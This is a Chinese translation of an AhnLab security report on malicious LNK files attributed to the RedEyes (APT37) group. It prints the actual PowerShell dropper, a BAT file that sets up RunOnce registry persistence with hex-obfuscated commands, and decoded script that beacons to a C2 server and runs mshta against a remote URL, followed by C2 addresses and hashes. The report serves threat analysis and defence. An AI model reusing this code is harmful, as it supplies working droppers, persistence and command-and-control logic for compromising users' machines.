传播后门的恶意 LNK：RedEyes (ScarCruft)

AhnLab 安全紧急响应中心 (ASEC)确认，该恶意软件以前以 CHM 格式传播，现在以 LNK 格式传播。恶意代码通过mshta进程执行特定url中存在的附加脚本，从攻击者的服务器接收命令，并执行附加的恶意操作。

经确认，已确认的 LNK 文件是由攻击者将包含恶意代码的压缩文件上传到正常站点来分发的。

图1. hxxp://a*****fo.co.kr/member/ 页面发现恶意代码

恶意 LNK 文件以文件名“REPORT.ZIP”上传。该文件在 LNK 内包含正常的 Excel 文档数据和恶意脚本代码，就像 中识别的恶意软件一样。

图 2. 包含恶意 LNK 文件的压缩文件

图 3. LNK 中包含的附加文件数据

因此，当执行“Status Survey.xlsx.lnk”文件时，会通过PowerShell命令在%Temp%文件夹中创建并执行正常文档“Status Survey.xlsx”和恶意脚本“PMmVvG56FLC9y.bat”。

/c powershell -windowstyle hidden $pEbjEn = Get-Location;if($pEbjEn -Match 'System32' -or $pEbjEn -Match 'Program Files') {$pEbjEn = '%temp%'};$lyHWPSj = Get-ChildItem -Path $pEbjEn -Recurse *.lnk ^| where-object {$_.length -eq 0x18C0000} ^| Select-Object -ExpandProperty FullName;if($lyHWPSj.GetType() -Match 'Object'){$lyHWPSj = $lyHWPSj[0];};$lyHWPSj;$C5ytw = gc $lyHWPSj -Encoding Byte -TotalCount 74240 -ReadCount 74240;$tyxkEP = '%temp%현황조사표.xlsx';sc $tyxkEP ([byte[]]($C5ytw ^| select -Skip 62464)) -Encoding Byte; ^& $tyxkEP;$Cbe1yj = gc $lyHWPSj -Encoding Byte -TotalCount 79888 -ReadCount 79888;$WH9lSPHOFI = '%temp%PMmVvG56FLC9y.bat';sc $WH9lSPHOFI ([byte[]]($Cbe1yj ^| select -Skip 74342)) -Encoding Byte;^& %windir%SysWOW64cmd.exe /c $WH9lSPHOFI;

“当前调查表.xlsx”是一个普通的Excel文档，冒充国内事业单位如下。

图 4. 状态调查表.xlsx 内容和属性

一起创建的“PMmVvG56FLC9y.bat”文件在执行时会复制到“%appdata%MicrosoftProtect”文件夹，文件名为“UserProfileSafeBackup.bat”。之后将BAT文件注册到下面的注册表中，这样就可以继续执行了。

1、注册表路径：HKCUSoftwareMicrosoftWindowsCurrentVersionRunOnce

2、值名称：BackupUserProfiles

3、值：C:WindowsSysWOW64cmd.exe /c %appdata%MicrosoftProtectUserProfileSafeBackup.bat

在注册表中注册后，执行BAT文件中以十六进制形式存在的PowerShell命令。

copy %~f0 "%appdata%MicrosoftProtectUserProfileSafeBackup.bat"
REG ADD HKCUSoftwareMicrosoftWindowsCurrentVersionRunOnce /v BackupUserProfiles /t REG_SZ /f /d "C:WindowsSysWOW64cmd.exe /c %appdata%MicrosoftProtectUserProfileSafeBackup.bat"
start /min C:WindowsSysWOW64cmd.exe /c powershell -windowstyle hidden -command 
"$m6drsidu ="$jWHmcU="""53746172742D536C656570202D""";$nj4KKFFRe="""""";for($xlEKy9tdBWJ=0;$xlEKy9tdBWJ -le $jWHmcU.Length-2;$xlEKy9tdBWJ=$xlEKy9tdBWJ+2){$dYaD=$jWHmcU[$xlEKy9tdBWJ]+$jWHmcU[$xlEKy9tdBWJ+1];$nj4KKFFRe= $nj4KKFFRe+[char]([convert]::toint16($dYaD,16));};
Invoke-Command -ScriptBlock ([Scriptblock]::Create($nj4KKFFRe));";
Invoke-Command -ScriptBlock ([Scriptblock]::Create($m6drsidu));"

执行 PowerShell 命令时，将使用 runkey 注册和 MSHTA 执行其他脚本。此外，还可以通过接收来自攻击者的命令来执行注册表注册。以下是上面BAT文件代码中以十六进制表示的PowerShell命令的一部分。

Start-Sleep -Seconds 67;
$nvSklUbaQ = 1024 * 1024;
$yixgsFVy = $env:COMPUTERNAME + '-' + $env:USERNAME+'-SH';
$aWw = 'hxxp://75.119.136[.]207/config/bases/config.php' + '?U=' + $yixgsFVy;
$bLmoifqHwJxhE = $env:TEMP + '/KsK';
if (!(Test-Path $bLmoifqHwJxhE)) { New-ItemProperty -Path "HKCU:SoftwareMicrosoftWindowsCurrentVersionRunOnce" -Name Olm -Value 'c:windowssystem32cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 311714 2.2.2.2 || mshta hxxp://bian0151.cafe24[.]com/admin/board/1.html' -PropertyType String -Force;}

已确认的C2和恶意URL如下：

1. hxxp://75.119.136[.]207/config/bases/config.php?U=[COMPUTERNAME]-[USERNAME]-SH // 接收攻击者命令

2. hxxp://75.119.136.207/config/bases/config.php?R=[base64-encoded 'EOF'] // 下发命令执行结果

3. hxxp://bian0151.cafe24[.]com/admin/board/1.html //下载附加脚本代码

在通过MSHTA执行的附加脚本代码（hxxp://bian0151.cafe24.com/admin/board/1.html）中，有一个base64混淆的PowerShell命令如下：窃听RedEyes组（APT37） > 。

图 5. 恶意脚本位于 hxxp://bian0151.cafe24.com/admin/board/1.html

解码后的 PowerShell 命令接收并处理来自攻击者的命令：hxxp://75.119.136[.]207/config/bases/config.php?U=[COMPUTERNAME]-[USERNAME]-SH。[图6]是解码后的PowerShell命令的一部分。

图 6. 解码的powershell命令

可以执行的命令和功能包括：

表格1. 可执行命令和函数

鉴于[表1]中列出的命令与之前识别的命令之间的差异，可以推测攻击者正在不断修改脚本代码。因此，除了目前已确认的功能之外，还可以执行各种恶意操作。

除了LNK文件之外，除了[图1]中的REPORT.ZIP文件之外，还识别出的KB_20230531.rar、attachment.rar和hanacard_20230610.rar压缩文件包含先前识别出的恶意CHM文件。与上述 LNK 文件一样，CHM 文件也是一种恶意代码，它使用 mstha 执行特定 url 中存在的附加脚本。

图 7. 包含恶意 CHM 文件的压缩文件

近期大量利用CHM、LNK的恶意代码正在传播，用户需格外小心。在恶意LNK的情况下，许多文件大小超过10MB的情况已得到证实，因此不应执行未知创建者的大型LNK文件。

【文件诊断】

Dropper/LNK.Generic.S2241 (2023.04.24.02)
Trojan/BAT.PsExec.S2247 (2023.06.13.02)
Downloader/Script.Generic.SC191708 (2023.08.17.03)

[行为诊断]

DefenseEvasion/DETECT.T1059.M11294
DefenseEvasion/DETECT.T1059.M11295 

[IOC]

0eb8db3cbde470407f942fd63afe42b8
2d444b6f72c8327d1d155faa2cca7fd7
27f74072d6268b5d96d73107c560d852
hxxp://75.119.136[.]207/config/bases/config.php

转载来源：https://asec.ahnlab.com/ko/56526/

图片来源网络侵权可联系删除